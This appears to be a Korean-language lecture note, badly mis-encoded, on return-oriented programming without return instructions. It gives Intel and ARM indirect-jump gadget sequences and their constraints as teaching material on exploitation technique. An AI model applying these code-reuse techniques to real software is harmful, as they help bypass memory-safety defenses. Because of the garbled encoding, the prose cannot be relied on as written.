    • 반환 멅ë đė–ī ė—†ėī 두 플ëžŦ폞 ëŠĻ두ė— 대한 튜링 ė™„ė „í•œ gadget ė„ļíŠļ 및 ė‹ĪėšĐė ėļ ęģĩęēĐ ėļėŠĪí„īėŠĪ화
  • ė ‘ę·ž ë°Đė‹
    • 반환ęģž ėœ ė‚Ží•œ(return-like) ė‹œí€€ėŠĪ ė‚ŽėšĐ
    • 후ëģī: 간ė ‘ ė í”„(indirect jumps)
    • Intel ė•„í‚Ī텍ėē˜: jmp *%eax
    • ARM ė•„í‚Ī텍ėē˜: blx r3
  • ė œė•― ė‚Ží•­
    • %eax, r3, â€Ķ registerë“Īė„ ëŊļëĶŽ ėīˆęļ°í™”í•īė•ž í•Ļ.
    • Returnė€ stack pointerëĨž ėžë™ėœžëĄœ ė—…데ėīíŠļ하ė§€ë§Œ, 간ė ‘ ė í”„는 ę·ļ렇ė§€ ė•ŠėŒ.

ROP without Returns

  • 반환ęģž ėœ ė‚Ží•œ ė‹œí€€ėŠĪ(Return-like Sequences)
    • Intel
      • pop %eax; jmp *%eax
        1. 대ėƒ ėĢžė†ŒëĨž %eax로 Pop
        2. pop 멅ë đė–ī는 stack pointerëĨž ėžë™ėœžëĄœ 4바ėīíŠļ ėĶę°€ė‹œí‚ī(returnęģž ėœ ė‚Ž)
        3. %eaxė— ė €ėžĨ된 ėĢžė†ŒëĄœ Jump
    • ARM
      • Pop-jump ė‹œí€€ėŠĪ가 ėĄīėžŽí•˜ė§€ ė•ŠėŒ.
      • Update-Load-Branch ė‹œí€€ėŠĪ ė‚ŽėšĐ
        1. (Update) adds r6,#4: r6ė— 4바ėīíŠļ ėķ”ę°€
        2. (Load) ldr r5, [r6]: 대ėƒ ėĢžė†ŒëĨž r5로 Load
        3. (Branch) blx r5: 대ėƒ ėĢžė†ŒëĄœ Branch
    • ëŽļė œė 
      • ėœ„ ė•„í‚Ī텍ėē˜ë“Īė—ė„œ 반환ęģž ėœ ė‚Ží•œ ė‹œí€€ėŠĪëĨž ė°ūęļ° ė–īë Īė›€.
ėĩœę·ž ėˆ˜ė •:
Contributors: kmbzn, Claude Sonnet 4.6

BUILT WITH

CloudflareNode.jsGitHubGitVue.jsJavaScriptVSCodenpm

All trademarks and logos are property of their respective owners.
ÂĐ 2026 kmbzn · MIT License